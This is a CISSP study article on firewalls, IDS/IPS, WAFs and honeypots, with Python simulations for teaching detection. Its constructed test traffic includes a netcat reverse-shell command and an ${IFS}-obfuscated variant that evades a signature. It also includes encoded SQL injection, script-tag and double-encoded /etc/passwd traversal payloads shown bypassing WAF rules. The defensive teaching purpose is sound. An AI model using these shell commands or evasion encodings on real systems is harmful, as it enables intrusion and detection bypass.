CISSP · Security Operations · 10 min read · 20 May 2026
Firewalls, IDS/IPS, Honeypots, and Next-Gen Security Controls
Network security controls are the technical tools that implement security policy at the network and application layers. For the CISSP exam, these controls are tested at the conceptual level: what each control does, what its limitations are, where it is deployed, and which control is most appropriate for a given scenario. Domain 7 covers these controls in the context of security operations: how they are managed and monitored, not how they are configured.
Firewall Generations
Firewalls have evolved significantly over time. Understanding the generations and what each can and cannot do is a consistent exam topic.
First generation – Packet filter firewalls examine individual IP packets and make allow/deny decisions based on source IP address, destination IP address, source port, destination port, and protocol. Packet filters are fast and scalable but stateless: each packet is examined in isolation, with no awareness of connection context. They cannot distinguish a packet that belongs to an established, legitimate connection from a packet that merely uses the same ports. The classic example is the "established" rule: because a stateless filter cannot recall a handshake, it typically passes any TCP segment with the ACK flag set on the assumption that it is a reply, so an attacker can send ACK-only segments (an ACK scan) to probe or reach ports behind the filter even though no SYN was ever seen.
Second generation – Stateful inspection firewalls track the state of network connections in a state table. A stateful firewall records which connections have been established (completed the TCP three-way handshake) and passes a packet only when it matches an existing state-table entry or is a SYN that a rule permits to open a new connection; an ACK-only segment with no matching entry is dropped. This closes the bypass possible against packet filters. Stateful firewalls also keep pseudo-state for connectionless protocols such as UDP and ICMP (a reply is allowed for a short window after an outbound request) and age entries out on timeouts, which is why a long-idle connection can be silently dropped. Stateful inspection became the standard for perimeter firewalls.
Third generation – Application layer firewalls (proxy firewalls) understand application-layer protocols and can inspect application content. An HTTP proxy firewall can see the HTTP request method, URL, and payload — not just the TCP port. This allows detection of application-layer attacks (SQL injection embedded in an HTTP parameter) that packet filter and stateful inspection firewalls cannot see. Application layer firewalls operate as proxies, terminating the client connection and initiating a new connection to the server.
Next-Generation Firewalls (NGFW) combine stateful inspection with deep packet inspection, application identification (identifying applications by their traffic patterns regardless of port), user identification (associating traffic with specific users rather than IP addresses), integrated IPS, SSL/TLS inspection (decrypting and re-encrypting TLS traffic to inspect the contents, which requires the firewall's own CA certificate to be trusted by every endpoint and breaks applications that pin certificates), and threat intelligence integration. NGFWs are the current standard for enterprise perimeter security.
For the exam: packet filter = simple IP/port filtering, no state. Stateful inspection = tracks connection state. Application layer = inspects application content (proxy). NGFW = application awareness + IPS + user identification + SSL inspection.
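The difference between the first two generations is easiest to see in code. The simulation below is an added example, not from the article: it puts a legitimate TCP handshake and an ACK-only probe to a closed port through a stateless packet filter (with the usual "anything carrying ACK is a reply" rule) and through a stateful firewall that advances a state table on the handshake. The addresses, the single `ALLOWED_SERVICES` rule and the `Packet` class are constructed for the example; real firewalls work on raw headers and track timeouts, sequence numbers and UDP/ICMP pseudo-state as well.

```python
"""Packet filter vs stateful inspection, as a small simulation.

Added example (not from the article). Packets are Python objects and the
ruleset is a single 'allow inbound TCP/80 to the web server' entry; real
firewalls work on raw headers, have default-deny rulesets and track
timeouts, UDP pseudo-state and sequence numbers as well.
"""
from dataclasses import dataclass

# Constructed environment: one protected server, one allowed service.
WEB_SERVER = "10.0.0.8"
ALLOWED_SERVICES = {("tcp", 80)}


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset  # subset of {"SYN", "ACK", "PSH", "FIN", "RST"}
    proto: str = "tcp"


def packet_filter(pkt):
    """First generation: every packet is judged alone on its header fields.
    The typical 'established' rule passes anything carrying ACK, because a
    stateless device has no other way to recognise a reply. That is the
    gap an ACK scan walks through."""
    if pkt.dst == WEB_SERVER and (pkt.proto, pkt.dport) in ALLOWED_SERVICES:
        return True                      # new inbound connection to an allowed service
    if "ACK" in pkt.flags:
        return True                      # assumed to be a reply to an existing connection
    return False


class StatefulFirewall:
    """Second generation: a state table keyed by the initiator's 4-tuple,
    advanced by the three-way handshake. A segment that matches no entry
    is dropped unless it is a bare SYN that a rule allows."""

    def __init__(self):
        self.table = {}  # (src, sport, dst, dport) -> "SYN_SENT" | "SYN_RECV" | "ESTABLISHED"

    def process(self, pkt):
        fwd = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        rev = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if fwd in self.table:
            key, from_client = fwd, True
        elif rev in self.table:
            key, from_client = rev, False
        else:
            # Only a bare SYN can open a connection, and only if a rule allows it.
            if pkt.flags == {"SYN"} and pkt.dst == WEB_SERVER and (pkt.proto, pkt.dport) in ALLOWED_SERVICES:
                self.table[fwd] = "SYN_SENT"
                return True
            return False                  # no state, not a permitted SYN: dropped (the ACK-scan case)

        if pkt.flags & {"FIN", "RST"}:   # simplified teardown: forget the connection
            del self.table[key]
            return True
        state = self.table[key]
        if state == "SYN_SENT" and not from_client and pkt.flags == {"SYN", "ACK"}:
            self.table[key] = "SYN_RECV"
            return True
        if state == "SYN_RECV" and from_client and pkt.flags == {"ACK"}:
            self.table[key] = "ESTABLISHED"
            return True
        if state == "ESTABLISHED":
            return True
        return False                      # flags do not fit the current state


def run_scenario():
    """Replay a legitimate handshake and an ACK scan through both devices."""
    client, attacker = "203.0.113.5", "198.51.100.9"   # constructed addresses
    handshake = [
        Packet(client, 40000, WEB_SERVER, 80, frozenset({"SYN"})),
        Packet(WEB_SERVER, 80, client, 40000, frozenset({"SYN", "ACK"})),
        Packet(client, 40000, WEB_SERVER, 80, frozenset({"ACK"})),
        Packet(client, 40000, WEB_SERVER, 80, frozenset({"ACK", "PSH"})),  # HTTP request data
    ]
    # ACK-only probe to a port no rule allows, with no preceding SYN (nmap -sA style).
    ack_scan = Packet(attacker, 55555, WEB_SERVER, 22, frozenset({"ACK"}))

    stateful = StatefulFirewall()
    return {
        "handshake_packet_filter": [packet_filter(p) for p in handshake],
        "handshake_stateful": [stateful.process(p) for p in handshake],
        "ack_scan_packet_filter": packet_filter(ack_scan),
        "ack_scan_stateful": stateful.process(ack_scan),
    }


if __name__ == "__main__":
    for name, result in run_scenario().items():
        print(f"{name}: {result}")
```

Both devices pass all four handshake packets, but only the packet filter passes the ACK-only probe to port 22: it has no way to know that no SYN preceded it, while the stateful firewall finds no table entry and drops it. The teardown handling is deliberately simplified (a real state table ages entries out and validates FIN sequencing), which is the same reason real stateful firewalls need timeouts and keep-alives for long-lived sessions.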
IDS vs IPS: Detection vs Prevention
Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) monitor network traffic and system activity for signs of malicious behaviour. The critical distinction between them is what they do when they detect a threat.
An IDS detects and alerts. When it identifies suspicious activity, it generates an alert for analyst investigation. An IDS does not take action to block or stop the attack; it is a passive monitoring tool. IDS is deployed in passive/tap mode: it receives a copy of network traffic (via a network tap or a switch port mirror/SPAN) but is not in the path of live traffic. Some IDS can send a TCP reset in response to an alert, but because the sensor is off-path this is best effort: the offending packets have already reached their destination.
An IPS detects and blocks. When it identifies suspicious activity, it automatically takes action to stop it: dropping the malicious packet, resetting the connection, or blocking the source IP. An IPS is deployed inline: all traffic passes through it, which gives it the ability to drop traffic and also makes it a single point of failure. If an IPS fails or is misconfigured, it can block legitimate traffic, a potential availability risk. Inline devices are therefore built to fail open (pass traffic uninspected, preserving availability) or fail closed (drop everything, preserving security), and which behaviour to configure is a policy decision rather than a default to accept unexamined.
Detection methods include: signature-based detection (matching traffic against known attack patterns; precise and effective for known attacks, but blind to unknown attacks and to trivially mutated variants of known ones), anomaly-based detection (comparing current activity against a baseline of normal behaviour and alerting on deviations; detects unknown attacks but generates more false positives, and the baseline must be learned from traffic known to be clean or an attack already under way is learned as normal), and specification-based detection (comparing activity against a defined model of expected behaviour, such as the legal state transitions of a protocol).
False positive management is one of the primary operational challenges for IDS/IPS. A false positive is an alert generated for legitimate traffic — it wastes analyst time and in the case of IPS, may block legitimate business traffic. Tuning IDS/IPS rules to minimise false positives without introducing false negatives (missed attacks) is an ongoing operational activity.
For the exam: IDS detects and alerts (passive, tap/mirror deployment). IPS detects and blocks (inline deployment, can affect availability). False positive management is critical for both.
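The trade-off between the two main detection methods is concrete enough to run. The block below is an added example, not code from the article or from any IDS product: it parses constructed connection-log lines, applies exact-match signatures, and applies a per-source anomaly threshold (mean plus three standard deviations of connections per minute) learned from a constructed baseline. The log format, the signature strings, the `BASELINE_COUNTS` table and the `TRAFFIC` lines are all invented for the example; Snort, Suricata and Zeek have their own rule languages and formats.

```python
"""Signature-based vs anomaly-based detection over constructed log lines.

Added example, not from the article. The log format, the signatures, the
baseline and the traffic are constructed for illustration; real sensors
(Snort/Suricata/Zeek) use their own rule languages and log formats.
"""
import re
from collections import Counter
from statistics import mean, pstdev

# Constructed signatures: exact patterns of known-bad content.
SIGNATURES = {
    "reverse-shell-nc": "nc -e /bin/sh",
    "php-webshell-eval": "eval(base64_decode(",
}

# Constructed per-minute connection counts from a clean learning window.
BASELINE_COUNTS = {
    "10.0.0.5": [9, 11, 10, 10, 10],   # web client, steady
    "10.0.0.7": [2, 3, 2, 3, 2],       # backup host, quiet during the learning window
}

# Constructed detection-window traffic, one connection per line.
TRAFFIC = [
    "2026-05-20T10:05:01 src=10.0.0.5 dst=10.0.0.8 dport=80 payload=GET /index.html",
    "2026-05-20T10:05:02 src=10.0.0.5 dst=10.0.0.8 dport=80 payload=GET /login",
    # known reverse-shell command: the signature fires
    "2026-05-20T10:05:03 src=10.0.0.9 dst=10.0.0.8 dport=8080 payload=POST /cgi-bin/x cmd=nc -e /bin/sh 10.0.0.9 4444",
    # same attack with the spaces replaced by ${IFS}: the exact-match signature is blind to it
    "2026-05-20T10:05:04 src=10.0.0.9 dst=10.0.0.8 dport=8080 payload=POST /cgi-bin/x cmd=nc${IFS}-e${IFS}/bin/sh 10.0.0.9 4444",
]
# Port sweep from the same host: 20 connections to 20 ports within one minute.
TRAFFIC += [f"2026-05-20T10:05:{10 + i:02d} src=10.0.0.9 dst=10.0.0.8 dport={20 + i} payload=" for i in range(20)]
# Legitimate backup burst: anomalous against a baseline learned outside the backup window (a false positive).
TRAFFIC += [f"2026-05-20T10:05:{30 + i:02d} src=10.0.0.7 dst=10.0.0.8 dport=443 payload=PUT /backup/{i}" for i in range(12)]

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) payload=(?P<payload>.*)$")


def parse_events(lines):
    """Parse log lines into dicts; malformed lines are skipped, not fatal."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["minute"] = ev["ts"][:16]  # YYYY-MM-DDTHH:MM bucket
        events.append(ev)
    return events


def signature_detect(events, signatures=SIGNATURES):
    """Known-pattern matching: precise, but only for what is in the ruleset."""
    return [{"sig": name, "src": ev["src"], "ts": ev["ts"]}
            for ev in events for name, pattern in signatures.items()
            if pattern in ev["payload"]]


def build_baseline(counts, floor=1.0):
    """Per-source mean and standard deviation of connections per minute.
    The floor stops a perfectly regular host from alerting on a single extra connection."""
    return {src: (mean(c), max(pstdev(c), floor)) for src, c in counts.items()}


def anomaly_detect(events, baseline, k=3.0, floor=1.0):
    """Alert when a source exceeds mean + k*stddev connections in a minute.
    A source with no baseline is treated as mean 0, so any burst from it alerts."""
    per_minute = Counter((ev["src"], ev["minute"]) for ev in events)
    alerts = []
    for (src, minute), n in per_minute.items():
        mu, sigma = baseline.get(src, (0.0, floor))
        threshold = mu + k * sigma
        if n > threshold:
            alerts.append({"src": src, "minute": minute, "count": n, "threshold": round(threshold, 1)})
    return alerts


def run(lines=TRAFFIC):
    events = parse_events(lines)
    return {"signature": signature_detect(events),
            "anomaly": anomaly_detect(events, build_baseline(BASELINE_COUNTS))}


if __name__ == "__main__":
    for kind, alerts in run().items():
        print(kind, alerts)
```

On this traffic the signature engine raises exactly one alert and misses the `${IFS}` variant of the same command, which is the "blind to unknown and mutated attacks" limitation. The anomaly engine catches the port sweep from 10.0.0.9 but also flags the backup host's legitimate burst, because the baseline was learned while that host was quiet: that alert is the false positive an analyst has to tune out, typically by extending the learning window to cover the backup schedule rather than by raising `k` for every host.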
Web Application Firewall (WAF)
A WAF is a specialised firewall that sits in front of web applications and inspects HTTP/HTTPS traffic for application-layer attacks. While a NGFW provides general network security, a WAF is specifically tuned for web application vulnerabilities.
WAFs protect against: SQL injection (detecting SQL syntax in HTTP parameters), cross-site scripting (detecting script injected into web requests), cross-site request forgery, HTTP request smuggling, directory traversal, and other injection-style attacks from the OWASP Top 10. They do not address the entries that look like legitimate requests to the WAF, such as broken access control and business-logic flaws, and attackers actively test encoding and obfuscation variants to get payloads past WAF rules. A WAF is a compensating control placed in front of an application, not a substitute for fixing the vulnerability in the code.
WAFs are deployed in one of three modes: transparent proxy (inline, inspects traffic without changing the connection), reverse proxy (terminates the client connection and proxies requests to the backend server), or out-of-band (receives a copy of traffic, can generate alerts but not block in real time).
For the exam: WAF is the specific control for web application attacks. It should be recommended when the question involves protecting a web application against SQL injection, XSS, or other application-layer attacks. A network firewall alone is insufficient for application-layer protection.
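The practical difference between a WAF and a generic network control is that the WAF must understand the request well enough to see the attack the way the application will. The block below is an added example, not the article's or any WAF vendor's code: three constructed rules are run against the path and each query parameter of constructed requests, once on the raw wire form and once after bounded percent-decoding and lowercasing. The rules, the `REQUESTS` table and the `MAX_DECODE_PASSES` limit are assumptions for the example; production rule sets such as the OWASP ModSecurity Core Rule Set are far larger and also inspect headers, cookies and bodies.

```python
"""WAF parameter inspection with and without input normalisation.

Added example, not the article's or any WAF product's code. The three rules
and the sample requests are constructed for illustration; production rule
sets (e.g. the OWASP ModSecurity Core Rule Set) are far larger and also
inspect headers, cookies and request bodies.
"""
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed rules, evaluated against the path and each decoded parameter value.
RULES = {
    "sqli-tautology": re.compile(r"['\"]\s*or\s*\d+\s*=\s*\d+", re.I),
    "xss-script-tag": re.compile(r"<\s*script", re.I),
    "path-traversal": re.compile(r"\.\./|\.\.\\"),
}

MAX_DECODE_PASSES = 3  # double encoding is common; unbounded decoding is a CPU sink


def normalise(value):
    """Percent-decode until the value stops changing (bounded), then lowercase,
    so that rules see what the application will see rather than the wire form."""
    for _ in range(MAX_DECODE_PASSES):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


def split_query(query):
    """Split a raw query string into (key, value) pairs without decoding."""
    pairs = []
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            pairs.append((key, value))
    return pairs


def inspect(request_line, normalise_input=True):
    """Return the sorted rule names matching the request's path or any parameter."""
    _method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    candidates = [parts.path] + [value for _key, value in split_query(parts.query)]
    hits = set()
    for raw in candidates:
        candidate = normalise(raw) if normalise_input else raw
        for name, rule in RULES.items():
            if rule.search(candidate):
                hits.add(name)
    return sorted(hits)


# Constructed requests: one benign, one plain attack, three encoded attacks.
REQUESTS = {
    "benign": "GET /search?q=firewall+generations HTTP/1.1",
    "sqli-plain": "GET /items?id=1'or1=1 HTTP/1.1",
    "sqli-encoded": "GET /items?id=1%27%20or%201%3D1 HTTP/1.1",
    "xss-encoded": "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1",
    "traversal-double-encoded": "GET /download?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1",
}


def compare(requests=REQUESTS):
    """For each request: (rules hit on the raw value, rules hit after normalisation)."""
    return {name: (inspect(line, normalise_input=False), inspect(line, normalise_input=True))
            for name, line in requests.items()}


if __name__ == "__main__":
    for name, (raw_hits, norm_hits) in compare().items():
        print(f"{name:26s} raw={raw_hits} normalised={norm_hits}")
```

Without normalisation only the unencoded tautology is caught; the percent-encoded SQL injection, the encoded `<script>` tag and the double-encoded traversal all slip past rules that would match them in decoded form. The decoding depth is itself a tuning decision: if the WAF decodes more times than the backend does, it blocks requests the application would have treated as harmless literals, and if it decodes fewer, the evasion works. Matching the WAF's canonicalisation to the application's is part of deploying it, which is why WAF tuning is an operations task rather than a one-time install.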
Honeypots and Honeynets: Deception Technology
A honeypot is a decoy system designed to attract and detect attackers. It appears to be a legitimate system containing valuable data or services but is actually isolated, monitored, and contains no real business data. Any access to a honeypot is suspicious by definition — legitimate users have no reason to access a decoy system.
Honeypots serve three purposes: early warning (an attacker who accesses a honeypot is detected before they reach real systems), intelligence gathering (observing attacker behaviour on the honeypot reveals their tools, techniques, and objectives), and distraction (an attacker engaged with a honeypot is not attacking real systems).
A honeynet is a network of honeypots that simulates an entire network environment, providing a more realistic and engaging target for sophisticated attackers.
Honeypots raise legal considerations. The exam distinguishes enticement (making a decoy available and letting an attacker choose to access it, which is generally lawful) from entrapment (inducing someone to commit an offence they would not otherwise have committed, which can undermine prosecution); a honeypot should entice, not entrap. Organisations must also ensure that a compromised honeypot cannot be used as a platform for attacks against third parties, which is why honeypots are isolated and their outbound traffic is tightly controlled, and they should consider the privacy implications of recording everything an intruder does on the system.
For the exam: honeypots are detection and intelligence tools. Any access to a honeypot is an alert by definition. They are particularly effective for detecting lateral movement (an attacker who has compromised internal systems may reach internal honeypots that external users would never access).
Sandboxing and AI/ML-Based Detection
Sandboxing is the execution of potentially malicious code in an isolated, monitored environment to observe its behaviour without risk to production systems. Malware sandboxes detonate suspicious files or URLs and analyse their behaviour: what registry keys do they modify, what network connections do they establish, what files do they create or modify?
Sandboxing is effective for detecting malware that evades signature-based detection (unknown malware). Modern malware often includes sandbox detection techniques (VM detection, delayed execution) to avoid analysis, which has led to increasingly sophisticated sandbox environments that attempt to appear as real systems.
AI and machine learning are increasingly embedded in security tools: NGFW threat scoring, EDR behavioural analysis, email security ML models, SIEM anomaly detection, and UEBA platforms all use ML to improve detection accuracy and reduce false positive rates.
Exam Tip
IDS detects and alerts (passive, tap/mirror). IPS detects and blocks (inline, availability risk from false positives). WAF protects web applications from application-layer attacks. Honeypots generate alerts from any access. NGFW is the current perimeter security standard, providing stateful inspection + application awareness + IPS + SSL inspection. The exam tests placement: IPS inline, IDS passive/tap. If a question asks which control blocks attacks automatically, the answer is IPS or NGFW, not IDS.